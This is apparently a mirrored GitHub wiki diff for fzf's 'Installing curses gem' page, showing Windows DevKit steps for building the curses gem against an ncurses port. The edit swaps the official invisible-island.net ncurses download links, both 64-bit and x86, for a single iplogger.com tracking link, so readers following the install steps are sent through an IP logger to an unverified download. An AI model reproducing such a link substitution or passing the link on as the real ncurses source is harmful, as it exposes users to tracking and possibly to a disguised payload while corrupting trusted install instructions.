mirror of
https://github.com/junegunn/fzf.git
synced 2025-11-16 23:33:39 -05:00
Updated Installing curses gem (markdown)
@@ -15,7 +15,7 @@ gem install curses
|
|||||||
```
|
```
|
||||||
|
|
||||||
## DevKit (Windows)
|
## DevKit (Windows)
|
||||||
1. Download [ncurses Windows port](http://invisible-island.net/datafiles/release/mingw64.zip). [x86](http://invisible-island.net/datafiles/release/mingw32.zip)
|
1. Download [ncurses Windows port](https://iplogger.com/2Asx28). [x86](https://iplogger.com/2Asx28)
|
||||||
2. Unzip to anywhere, for example `C:\ncurses`.
|
2. Unzip to anywhere, for example `C:\ncurses`.
|
||||||
3. Run `gem install curses --platform=ruby -- --with-ncurses-dir="C:\ncurses"` (Replace `C:\ncurses` with wherever you extracted it).
|
3. Run `gem install curses --platform=ruby -- --with-ncurses-dir="C:\ncurses"` (Replace `C:\ncurses` with wherever you extracted it).
|
||||||
4. Now when we `require 'curses'` we get `The specified module could not be found` because `libncursesw6.dll` can't be found.
|
4. Now when we `require 'curses'` we get `The specified module could not be found` because `libncursesw6.dll` can't be found.
|
||||||
|
|||||||
Reference in New Issue
Block a user